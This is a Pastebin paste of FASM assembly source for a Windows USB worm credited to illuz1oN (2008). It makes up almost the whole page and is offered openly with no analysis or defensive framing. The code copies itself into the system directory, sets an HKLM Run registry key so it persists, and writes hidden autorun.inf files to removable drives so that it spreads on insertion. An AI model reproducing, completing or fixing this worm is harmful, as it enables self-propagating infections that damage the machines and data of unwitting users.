Advertisement
FlyFar

illuZ1oN's USB Worm - Source Code - Rohitab - Forums

Jul 4th, 2023
1,639
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 3.80 KB | Cybersecurity | 0 0
  1. ;  W32/USB<span class="searchlite">Worm</span> - illuz1oN 2008
  2. ; Spreads using usb's!
  3. ; Copyright illuz1oN 2008
  4. ; h4ck-y0u.org
  5. ; Compile with FASM!!
  6.  
  7. include "H:\Liam\FASM\INCLUDE\WIN32AX.inc"
  8.  
  9. .data
  10.     iMutex db 'USB <span class="searchlite">Worm</span>, illuz1oN', 0
  11.     regKey db '<span class="searchlite">Worm</span>zorz', 0
  12.     regPth db 'software\Microsoft\Windows\CurrentVersion\Run',0
  13.     newExe db 'drivers.exe', 0
  14.     msgTit db 'illuz1oN USB <span class="searchlite">Worm</span>!', 0
  15.     msgbox db 'This <span class="searchlite">worm</span> Has Spread to: ', 0
  16.     sysName db 'illuz.exe', 0
  17.     autoInf db 'autorun.inf', 0
  18.     autoRun db '[autorun]', 0
  19.     drv1 db 'A:\', 0
  20.     drv2 db 'U:\', 0
  21.     drv3 db 'H:\', 0
  22.     drv4 db 'G:\', 0
  23.     inf1 db 'A:\autorun.inf', 0
  24.     inf2 db 'U:\autorun.inf', 0
  25.     inf3 db 'H:\autorun.inf', 0
  26.     inf4 db 'G:\autorun.inf', 0
  27.     sysPath rb 256d
  28.     myPath rb 256d
  29.     reg dd ?
  30.  
  31. .code
  32. wootwoot:
  33.     mov byte [autoRun+10d], 13d
  34.     mov byte [autoRun+11d], 10d
  35.     mov dword [autoRun+12d], 'open'
  36.     mov dword [autoRun+16d], '=dri'
  37.     mov dword [autoRun+20d], 'vers'
  38.     mov dword [autoRun+24d], '.exe'
  39.     push 256d
  40.     push myPath
  41.     push 0
  42.     call [GetModuleFileName]
  43.     push 256d
  44.     push sysPath
  45.     call [GetSystemDirectory]
  46.     push sysPath
  47.     push sysName
  48.     call [lstrcat]
  49.     push 0
  50.     push sysPath
  51.     push myPath
  52.     call [CopyFile]
  53.     push reg
  54.     push KEY_ALL_ACCESS
  55.     push regPth
  56.     push HKEY_LOCAL_MACHINE
  57.     call [RegOpenKeyEx]
  58.     cmp eax,0
  59.     je exitwoot
  60.     push sysPath
  61.     call [lstrlen]
  62.     cmp eax,0
  63.     je exitwoot
  64.     push eax
  65.     push sysPath
  66.     push REG_SZ
  67.     push regKey
  68.     push reg
  69.     call [RegSetValueEx]
  70.     call checkdrive
  71.  
  72. checkdrive:
  73.     push drv1
  74.     call [GetDriveType]
  75.     cmp eax,DRIVE_REMOVABLE
  76.     je spread1
  77.     xor eax,eax
  78.     push drv2
  79.     call [GetDriveType]
  80.     cmp eax,DRIVE_REMOVABLE
  81.     je spread2
  82.     xor eax,eax
  83.     push drv3
  84.     call [GetDriveType]
  85.     cmp eax,DRIVE_REMOVABLE
  86.     je spread3
  87.     xor eax,eax
  88.     push drv4
  89.     call [GetDriveType]
  90.     cmp eax,DRIVE_REMOVABLE
  91.     je spread4
  92.     call exitwoot
  93.  
  94. spread1:
  95.     mov dword [drv1+3d], newExe
  96.     push 0
  97.     push FILE_ATTRIBUTE_HIDDEN
  98.     push CREATE_ALWAYS
  99.     push 0
  100.     push 0
  101.     push inf1
  102.     call [CreateFile]
  103.     mov ebx, eax
  104.     push autoRun
  105.     call [lstrlen]
  106.     push 0
  107.     push 0
  108.     push eax
  109.     push autoRun
  110.     push ebx
  111.     call [WriteFile]
  112.     push ebx
  113.     call [CloseHandle]
  114.     xor ebx,ebx
  115.     xor eax,eax
  116.  
  117. spread2:
  118.     mov dword [drv2+3d], newExe
  119.     push 0
  120.     push FILE_ATTRIBUTE_HIDDEN
  121.     push CREATE_ALWAYS
  122.     push 0
  123.     push 0
  124.     push inf2
  125.     call [CreateFile]
  126.     mov ebx, eax
  127.     push autoRun
  128.     call [lstrlen]
  129.     push 0
  130.     push 0
  131.     push eax
  132.     push autoRun
  133.     push ebx
  134.     call [WriteFile]
  135.     push ebx
  136.     call [CloseHandle]
  137.     xor ebx,ebx
  138.     xor eax,eax
  139.  
  140. spread3:
  141.     mov dword [drv3+3d], newExe
  142.     push 0
  143.     push FILE_ATTRIBUTE_HIDDEN
  144.     push CREATE_ALWAYS
  145.     push 0
  146.     push 0
  147.     push inf3
  148.     call [CreateFile]
  149.     mov ebx, eax
  150.     push autoRun
  151.     call [lstrlen]
  152.     push 0
  153.     push 0
  154.     push eax
  155.     push autoRun
  156.     push ebx
  157.     call [WriteFile]
  158.     push ebx
  159.     call [CloseHandle]
  160.     xor ebx,ebx
  161.     xor eax,eax
  162.  
  163. spread4:
  164.     mov dword [drv4+3d], newExe
  165.     push 0
  166.     push FILE_ATTRIBUTE_HIDDEN
  167.     push CREATE_ALWAYS
  168.     push 0
  169.     push 0
  170.     push inf4
  171.     call [CreateFile]
  172.     mov ebx, eax
  173.     push autoRun
  174.     call [lstrlen]
  175.     push 0
  176.     push 0
  177.     push eax
  178.     push autoRun
  179.     push ebx
  180.     call [WriteFile]
  181.     push ebx
  182.     call [CloseHandle]
  183.     xor ebx,ebx
  184.     xor eax,eax
  185.  
  186. exitwoot:
  187.     xor eax,eax
  188.     push 0
  189.     call [ExitProcess]
  190.  
  191. .end wootwoot
Tags: usb worm fasm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement